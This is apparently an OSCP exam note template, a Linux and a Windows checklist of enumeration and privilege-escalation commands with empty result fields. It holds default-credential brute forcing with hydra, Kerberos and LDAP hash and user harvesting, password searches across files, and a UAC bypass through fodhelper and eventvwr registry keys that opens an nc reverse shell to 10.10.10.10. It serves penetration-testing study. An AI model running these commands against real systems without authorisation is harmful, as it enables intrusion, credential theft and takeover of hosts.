Exam note template for OSCP.
There are two templates, one for Linux and one for Windows.
They provide you with a check list for information gathering.
Go through them one by one; you may need to come back and redo the list as needed (if you get stuck in the exam).
-
OS
# Result:
-
Creds
# Result:
# Result:
Screenshot:
# Result:
Screenshot:
Ports Open |
---|
Try default credentials. anonymous? guest:guest? admin:admin? root:root?
Banner
# Result:
Nmap script scan
# Result:
Brute force
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp -vV -f
# Result:
Can upload file?
# Result:
Public vulnerability?
# Result:
Banner. Is the version vulnerable?
# Result:
Additional info (ssh root@ip)
# Result:
User name found? Try machine name? username:username? username:hostname?
# Result:
Banner
# Result:
Nmap script scan
# Result:
Got usernames? Username enum?
# generate usernames first with usernamer.py
# smtp-user-enum
# don't forget username as password
# Result:
Public vulnerability?
# Result:
Subdomains?
# Result:
Zone Transfer?
# Result:
# Result:
# Result:
# Result:
With domain name? vhost?
# Result:
whatweb -a 3 http://ip
# Result:
Simple Bypass?
# Result:
Any interesting information?
# Result:
# Result:
Anything interesting?
# Result:
# Result:
Command injection? Change request method?
# Result:
# Result:
# Result:
Anything interesting? Base64? JWT?
# Result:
# Result:
Can you lock the account out?
# Result:
Server document root
# Result:
url open settings
# Result:
# Result:
# Result:
Identify username
ident-user-enum <target-ip> <port-list>
# Result:
Null session?
# Result:
Can list shares?
# Result:
Nmap script scan:
# Result:
Version < 2.2.8? Cannot get version? Try wireshark? https://www.exploit-db.com/exploits/10
# Result:
enum4linux
# Result:
Anonymous login?
# Result:
Files
# Result:
Banner
# Result:
Nmap script scan
# Result:
Default credential:
root:(empty)
root:root
# Result:
Brute force?
# Result:
Default credential:
postgres:postgres
postgres:(empty)
# Result:
# Result:
# Result:
# Result:
# Result:
grep -vE "nologin|false" /etc/passwd;ls -al /etc/passwd
# Result:
Users on target
# Result:
/etc/passwd file permission
# Result:
/etc/shadow file permission
ls -al /etc/shadow
# Result:
# Result:
# Result:
# Result:
sudo -V
# Result:
sudo -l
# Result:
Any interesting PATH?
cat /etc/cron*
# Result:
ps aux | grep root
# Result:
cat /etc/fstab
# Result:
find / -perm -04000 -type f 2>/dev/null
# Result:
getcap -r / 2>/dev/null
# Result:
Command
netstat -antlp
ss -antlp
# Result:
Command
find / -writable -type f 2>/dev/null
# Result:
find / -writable -type d 2>/dev/null
# Result:
# Result:
cat ~/.bash_history
# Result:
# Result:
# Result:
# Result:
# Result:
-
OS
# Result:
-
Creds
# Result:
Try These
npusers, userspns, bloodhound-python, rpcclient, crackmapexec smb, crackmapexec winrm, ldapsearch, mount share.
# Result:
Screenshot:
# Result:
Screenshot:
Ports Open |
---|
Try default credentials. anonymous? guest:guest? admin:admin? root:root?
Banner
# Result:
Nmap script scan
# Result:
Brute force
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp -vV -f
# Result:
Can upload file?
# Result:
Public vulnerability?
# Result:
Banner. Is the version vulnerable?
# Result:
Additional info (ssh root@ip)
# Result:
User name found? Try machine name? username:username? username:hostname?
# Result:
Banner
# Result:
Nmap script scan
# Result:
Got usernames? Username enum?
# generate usernames first with usernamer.py
# smtp-user-enum
# don't forget username as password
# Result:
Public vulnerability?
# Result:
dig @dc-ip domain.com
# Result:
zone transfer
dig axfr @dc-ip domain.com
# Result:
dnsenum
dnsenum --dnsserver dc-ip --enum domain.com -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o dnsenum
# Result:
Any interesting files we can download?
Mssql present? master.mdf?
# Result:
# Result:
Service accounts? Printers?
enumprinters
# Result:
Users?
queryuser
# Result:
/opt/IOXIDResolver/IOXIDResolver.py -t 10.11.1.221
# Result:
namingcontexts
ldapsearch -x -s base -H ldap://10.10.10.10 namingcontexts
# Result:
Check if auth required
ldapsearch -h domain.com -x -b "DC=domain,DC=com"
# Result:
Get users (if you can)
ldapsearch -x '(samaccountType=805306368)' -b 'DC=hutch,DC=offsec' -H ldap://192.168.245.122 | grep -i samaccountname
# Result:
Description (if you can)
ldapsearch -x '(samaccountType=805306368)' -b 'DC=hutch,DC=offsec' -H ldap://192.168.245.122 | grep -i desc
# Result:
Get np users (if you can)
impacket-GetNPUsers -dc-ip 192.168.10.10 -no-pass -usersfile user.lst domain.com/ -format hashcat
# Result:
Nmap script scan
# Result:
crackmapexec
crackmapexec smb 10.10.10.10 -u 'woohoo' -p '' --shares
# Result:
smbclient
smbclient -L //ip -N
# Result:
Version? Cannot get version? Try wireshark?
# Result:
# Result:
Check version. Link.
# Result:
# Result:
# Result:
# Result:
Simple Bypass?
# Result:
Any interesting error messages?
# Result:
# Result:
# Result:
# Result:
Command injection? Change request method?
# Result:
# Result:
# Result:
# Result:
# Result:
Can you lock the account out?
# Result:
Server document root
# Result:
url open settings
# Result:
# Result:
# Result:
Users
rdesktop -u '' -a 16
# Result (A screenshot will do):
# Result:
Banner
# Result:
Nmap script scan
# Result:
Banner
# Result:
Nmap script scan
# Result:
Default credential:
root:(empty)
root:root
# Result:
Brute force?
# Result:
Default credential:
postgres:postgres
# Result:
impacket-GetUserSPNs
# Result:
Crack the hash?
# Result:
Found user's NTLM hash? Can you pass it?
# Result:
# Result:
# Result:
# Result:
Any new user found? Privilege escalate to them first?
# Result:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
# Result:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Result:
REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
# Result:
RDP Access?
# just open an Administrator command prompt
fodhelper? eventvwr?
# fodhelper.exe
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "c:\windows\tasks\nc.exe 10.10.10.10 443 -e cmd.exe" /f
# eventvwr.exe
REG ADD HKCU\Software\Classes\mscfile\shell\open\command
REG ADD HKCU\Software\Classes\mscfile\shell\open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\mscfile\shell\open\command /d "C:\windows\tasks\nc.exe 10.10.10.10 443 -e cmd.exe" /f
For more, check the following repo.
https://github.com/hfiref0x/UACME
# Result:
# Result:
# Result:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"
# Result:
netstat -ano
# Result:
powershell -c [environment]::OSVersion.Version
# Result:
schtasks /query /fo LIST /v | findstr /v "\Microsoft" | findstr /i "taskname"
schtasks /query /fo LIST /v /tn <taskname>
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Get-ScheduledTask -TaskName "Word" -Verbose | Select *
# Result:
# Result:
wmic qfe list | findstr /i KB4540673
# Result:
dir "C:\Program Files"
dir "C:\Program Files (x86)"
# Result:
upnp? IKEEXT
sc query IKEEXT
# Result:
dir wlbsctrl.dll /s
PATH
# Result:
usosvc? Can modify? Can configure?
sc qc UsoSvc
# Result:
Interesting files in C:? C:\Users___\AppData\Roaming? Home dir? Source code? Script code? Passwords in files? (May take a long time to finish)
dir /a
findstr /spin /c:"pass" C:\* 2>nul
findstr /spin /c:"passwd" C:\* 2>nul
findstr /spin /c:"password" C:\* 2>nul
$files = ("unattended.xml", "sysprep.xml", "autounattended.xml","unattended.inf", "sysprep.inf", "autounattended.inf","unattended.txt", "sysprep.txt", "autounattended.txt")
$output = $output + (get-childitem C:\ -recurse -include $files -EA SilentlyContinue | Select-String -pattern "<Value>" | out-string)
# Result:
cmdkey /list
# Result:
YES?
runas /savedcred /user:administrator /path/to/payload
# Result:
# search for windows <build no.> kernel exploit
# windows exploit suggester
# seatbelt?
# Result: